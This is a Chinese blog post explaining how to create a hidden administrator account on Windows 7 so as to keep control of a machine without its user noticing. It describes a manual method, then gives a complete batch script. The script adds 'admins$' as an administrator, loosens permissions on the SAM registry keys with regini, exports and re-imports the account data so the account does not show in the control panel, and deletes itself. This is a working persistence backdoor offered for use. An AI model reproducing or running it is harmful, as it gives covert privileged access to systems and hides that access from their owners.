首页 > 程序开发 > 综合编程 > 其他综合 >

win7下实现批处理创建超级用户 By Assassin

2017-03-06

win7下实现批处理创建超级用户 By Assassin,众所周知的一些小技巧,如何拿到一台机器权限,一个方法就是给该机创建一个超级用户了,那么接下来就给大家讲解一个win7下实现的过程。

众所周知的一些小技巧,如何拿到一台机器权限,一个方法就是给该机创建一个超级用户了,那么接下来就给大家讲解一个win7下实现的过程。

1.界面操作法

(1)最基础创建用户代码

这里写图片描述

这里写图片描述

这里写图片描述

我们能看到cmd和控制面板里都能看到的,那么这么直接创造是可以被用户发现的。

(2)最最简单的隐藏,在账户后面加上$,这里在命令行隐藏了用户。但是这种方法在控制面板还是能看见

这里写图片描述

(3)然后我们给用户提升管理员权限

这里写图片描述

这里写图片描述

(4)那么我们怎么做到呢?方法就是先命令行创建超级用户,在注册表中保存关于账号的全部信息,然后命令行删除用户,最后将其注册表该账户的信息再导入到注册表中。 这样就可以在控制面板中看不到了。

这里写图片描述

首先在编辑->权限中将用户控制权限修改。

这里写图片描述

手动看到root$下面的类型值,在user下对应有一个文件夹,里面就是root$ 的登录信息

这里写图片描述

把该文件夹保存

这里写图片描述

将root$文件夹,对应类型的文件夹和超级用户的文件夹保存。

这里写图片描述

使user.reg(即原来root$对应文件夹)中的F值被超级用户文件夹对应的F值替换

这里写图片描述

然后我们删除用户!

这里写图片描述

将这些东西都导入!

这里写图片描述

这里写图片描述

(4)那么隐藏用户怎么登陆啊!这里将登陆界面改成必须输入账号名好了!

这里写图片描述

然后就搞定了,但是这么麻烦嘛!!!

2.批处理方法

直接上代码!

net user admins$ 1234567 /add

net localgroup administrators admins$ /add

Echo HKEY_LOCAL_MACHINESAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAM [1] >>c:/tem.ini

Echo HKEY ...

net user admins$ 1234567 /add

net localgroup administrators admins$ /add

Echo HKEY_LOCAL_MACHINESAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAM [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomains [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [1] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [1] >>c:/tem.ini

regini c:/tem.ini

regedit /e c:1.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers

net user admins$ /del

regedit /s c:1.reg

Echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [0] >c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomainsAccount [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAMDomains [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAMSAM [0] >>c:/tem.ini

Echo HKEY_LOCAL_MACHINESAM [0] >>c:/tem.ini

regini c:/tem.ini

del c: em.ini

del c:1.reg

del %0

这里用到了regini,可以用作常见的注册表提权!十分好用,建议大家了解一下,这里[0]是提权,对应的数字还有很多的,可以参考

REGINI神奇大门1

REGINI神奇大门2

1 - Administrators 完全访问

2 - Administrators 只读访问

3 - Administrators 读和写入访问

4 - Administrators 读、写入、删除访问

5 - Creator 完全访问

6 - Creator 读和写入访问

7 - everyone 完全访问

8 - everyone 只读访问

9 - everyone 读和写入访问

10 - everyone 读、写入、删除访问

11 - Power Users 完全访问

12 - Power Users 读和写入访问

13 - Power Users 读、写入、删除访问

14 - System Operators 完全访问

15 - System Operators 读和写入访问

16 - System Operators 读、写入、删除访问

17 - System 完全访问

18 - System 读和写入访问

19 - System 只读访问

20 - Administrators 读、写、执行访问

21 - Interactive User 完全访问

22 - Interactive User 读和写入访问

23 - Interactive User 读、写入、删除访问

之后就是我们之前说的,保存注册表然后删除用户,导入注册表。

但是这里有个问题啊,这里是将user整个文件夹无差别保存下来,然后删掉!最后恢复,还是很危险,不知道怎么实现精准的保存,大牛看到了请指导一下,不胜感激!

希望可以帮助到大家!

相关文章
最新文章
热点推荐